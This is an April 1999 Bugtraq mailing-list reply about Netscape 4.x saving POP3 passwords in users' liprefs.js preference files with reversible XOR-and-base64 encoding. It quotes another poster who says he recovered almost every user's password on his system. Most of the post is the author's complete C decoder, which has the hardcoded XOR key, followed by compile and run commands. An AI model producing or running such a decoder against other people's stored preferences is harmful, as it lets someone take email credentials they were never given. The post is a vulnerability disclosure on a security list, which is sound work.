[10168] in bugtraq
Re: Netscape 4.5 vulnerability
daemon@ATHENA.MIT.EDU (Wojtek Kaniewski)
Fri Apr 9 21:43:58 1999
Date: Thu, 8 Apr 1999 23:35:58 +0200
Reply-To: Wojtek Kaniewski <wojtekka@BYDNET.COM.PL>
From: Wojtek Kaniewski <wojtekka@BYDNET.COM.PL>
To: BUGTRAQ@NETSPACE.ORG
Alexey Pavlov wrote:
> I found method how to get users passwords from Netscape 4.5 for
> FreeBSD ~user/.netscape/liprefs.js file. This file is used for
> storing user last session preferences .This file also contains
> encrypted password for pop3.
This method has been found months ago.
> Not like a DES , this encryption can be decrypted. As a result of
> many experiments i wrote this program. It gives me almost all
> passwords in my system, because all people use Netscape.
> Here is src of this decryption programm:
> (snip)
Fascinating way to decrypt "xored" password :) Here's my little
decoder, that I wrote in April 1998 for Netscape 4.0x.
-----cut here-----
/* (c) 1998 by wojtek kaniewski (wojtekka@dione.ids.pl) */
#include <stdio.h>
char base64[] = \
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
char key[] = \
{ 86, 201, 239, 74, 155, 190, 90, 66, 119, 2, 67, 24, 112, 48, 139,
76, 176, 42, 214, 79, 149, 141, 250, 247, 87, 123, 152, 9, 67,
93, 1, 10 };
void main(int argc, char **argv) {
int d = 0, m = 7, b, i = 0, c;
char *p = (argc > 1) ? argv[1] : "";
for (; *p && *p != '='; p++) {
for (c = 0; c < 64 && *p != base64[c]; c++);
for (b = 5; b > -1; b--, m--) {
d |= ((c & (1 << b)) >> b) << m;
if (!m) {
printf("%c", d ^ key[i++]);
d = 0;
m = 8;
};
}
}
printf("\n");
}
-----cut here-----
$ gcc decode.c -o decode
$ ./decode <encrypted-password-here>
And no, it _won't_ get encrypted password from preferences file for you.
--
wojtekka@irc.pl :: http://wojtekka.stone.pl/ :: ^wojtekka@irc
